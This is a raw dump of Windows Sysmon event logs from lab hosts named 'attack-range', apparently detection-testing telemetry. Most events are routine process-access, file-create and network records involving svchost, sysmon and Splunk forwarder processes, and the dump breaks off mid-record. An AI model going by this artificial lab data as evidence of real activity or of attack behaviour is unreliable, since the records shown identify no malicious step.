11:03:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218953Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218952Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218951Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218950Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.159{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1491-6216-B504-000000003902}3572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218949Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.159{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1491-6216-B504-000000003902}3572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218948Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.160{4F8D34B0-1491-6216-B504-000000003902}3572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:46.896{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85F068DFAA6CECF1B2AB5FE30A2697B4,SHA256=D9587049BE44DF38667B0F8032591F20328EFCAB14D8B409E43AEFFB23B2889A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218966Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:46.815{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66B183A66681189B10338E6688234B0F,SHA256=42DE08C6653B19B9A811A3F56A5999C9B925FE4CEF63675CE3F9B01ECF490D37,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000294741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:46.534{C8EA50B7-1477-6216-9E06-000000003802}6844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 354300x8000000000000000294740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:43.640{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49171-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000294739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:46.150{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218965Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:46.316{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218993Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1493-6216-B704-000000003902}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218992Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218991Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218990Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218989Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218988Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218987Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1493-6216-B704-000000003902}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218986Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218985Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218984Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218983Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218982Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.847{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1493-6216-B704-000000003902}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218981Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.848{4F8D34B0-1493-6216-B704-000000003902}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218980Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.831{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=280CD26B5B98038B0EF2F81AA1F91BE3,SHA256=65D3C3CBE8435A3BDE0F3175EACAEFFA1C606953442DD20C784D73697B77E8CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:47.933{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1336F4ABA1F51E09A057BB2BC8E0191,SHA256=B2B753383DD0783B36D784AB71A3E556CC8D3382816E5104F4C624FEED99037A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:45.628{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49172-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000294745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:45.628{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49172-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 23542300x8000000000000000294744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:47.164{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C87A18A3C1B0400FD28AD54FAB36B832,SHA256=943622B93B47D3A4157D302261166FADEA05FF256B7D28ED0F51EB94D2491893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:47.164{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6AD0BCA0397AA5FFBE7A76165D37F0CB,SHA256=6826F103C96EC49C8C293D95ACDB8C1378F36394F5367AA8E796607C69C35D3E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218979Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1493-6216-B604-000000003902}3172C:\Program 